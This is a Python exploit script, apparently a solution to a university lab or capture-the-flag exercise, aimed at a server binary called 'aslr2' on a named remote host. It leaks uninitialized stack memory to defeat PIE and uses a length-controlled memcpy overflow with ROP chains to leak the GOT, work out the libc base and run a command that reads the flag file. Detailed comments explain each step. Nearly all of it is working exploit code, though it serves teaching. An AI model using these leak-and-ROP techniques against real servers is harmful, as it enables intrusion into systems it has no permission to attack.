import sys
import struct
import socket
from aslr_common import *

# remote
host = 'lettieri.iet.unipi.it'
port = 4442

# 1st phase: defeat PIE

# the echo() function contains a bug: the read() may return n bytes with n <
# MEDIUM_BUF, but the function always sends MEDIUM_BUF bytes.  Since the other
# MEDIUM_BUF - n bytes are not initialized, we can receive part of the stack
# contents. In particular, if we first cause child() to call do_stuff() and
# then echo(), we can receive part of the stack-frame of do_stuff(). This frame
# may contain the return addresses pushed on the stack when do_stuff called
# myatoi() and/or memcpy(). By running the binary in the debugger we can see
# that the buf declared in echo() indeed contains a couple of return addresses.
# In particular, it contains do_stuff+52 at offset 7*8.
#
# The idea, then, is to first call do_stuff and then echo in the same session.
# When calling echo we send less than 7*8 byte to avoid overwriting
# do_stuff+52, which we can than extract from the returned data. If we subtract
# the offset of do_stuff (extracted from the binary) and 52, we obtain the load
# address of the executable.

# offset of do_stuff in aslr2 (nm aslr2 | grep '\<do_stuff\>')
do_stuff_off    = 0x12b5

s = socket.create_connection((host, port))
# we need to be careful with syncronization problems here. We want aslr2 to
# exit from the first read and call do_stuff, then read() again and call
# echo(). There is another read() inside echo(), and we need to be sure that
# aslr2 returs from this one too, and that the number of read bytes is less
# than 7*8. When we send something on a TCP/IP connection, we are just adding
# bytes to a stream. There is no a-priori relation between our send()
# operations and the read() operations of the server, since there are no
# message boundaries in a TCP/IP stream. If we want to be sure that two send()
# operations will correspond to two distinct read()s, we have two choices: -
# send enough bytes to fill the read() buffer (the third argument passed to
# read) - delay the second send() by a sufficient amount of time The second
# method is not very robust, so it is always better to prefer the first one
# whenever possible.
#
# first send: cause a return from the read() in child() and a call to do_stuff()
s.send(b'1'+b'A'*511)
# second send, served by the read() in child() when do_stuff() returns. We cause
# read() to return again. This time we want the sever to call echo()
s.send(b'0'+b'A'*511)
# third send: this will be served by the read() in echo().
s.send(b'A')
b = recvn(s, 128)
do_stuff_p52 = struct.unpack('Q', b[7*8:7*8+8])[0]

exe_base = do_stuff_p52 - do_stuff_off - 52

print("exe_base:  %x" % exe_base)

# 2nd phase: defeat ASLR
#
# Once we know the load address of aslr2 we can proceed as usual. The only
# difference is that our copy of aslr2 will give us only the offsets of the
# ROP gadgets. We will then have to add the load address to these offsets.
#
# We need to find another bug, though, since the one in echo() does not allow
# us to overflow buf. There is is indeed another bug in do_stuff(), since the
# number of bytes to be copied is taken from the data sent by us (myatoi).
#
# We use the same idea as for the other servers: we inject a ROP chain that
# will send us the executable's GOT.

rebase_1 = lambda x : p(x + exe_base)

# constants
pop_rdi         = rebase_1(0x167b)
pop_rsi_r15     = rebase_1(0x1679)
write_plt       = rebase_1(0x1040)
got             = rebase_1(0x34a0)
setsockopt_off  = 0xff410
pad             = 56

# we need to send the lenght of the payload, in ASCII, at the start of the
# payload itself. These characters will also be copied by memcpy() and,
# therefore, they are part of the 'padding' that we use to reach the saved
# return address. To simplify things, we always send 512 bytes.

rop  = pop_rdi
rop += p(1)
rop += pop_rsi_r15
rop += got
rop += b'B'*8
rop += write_plt

o = str(512).encode() + (pad-3)*b'A' + rop
o += (512-len(o))*b'B'

# We can reuse the same connection alrady created in the 1st phase, since we
# have not caused any fault in the server yet.
s.send(o)
b = recvn(s, 8)
s.close()
setsockopt_vaddr = struct.unpack('Q', b)[0]

libc_base = setsockopt_vaddr - setsockopt_off

print("libc_base: %x" % libc_base)

# 3rd phase: gain control

rop = mkrop(b'', libc_base)

o = str(512).encode() + (pad-3)*b'A' + rop
o += (512-len(o))*b'B'

s = socket.create_connection((host, port))
s.send(o)
s.send(b'/bin/cat flag.txt\n')
b = s.recv(200)
sys.stdout.buffer.write(b'flag:      ' + b)
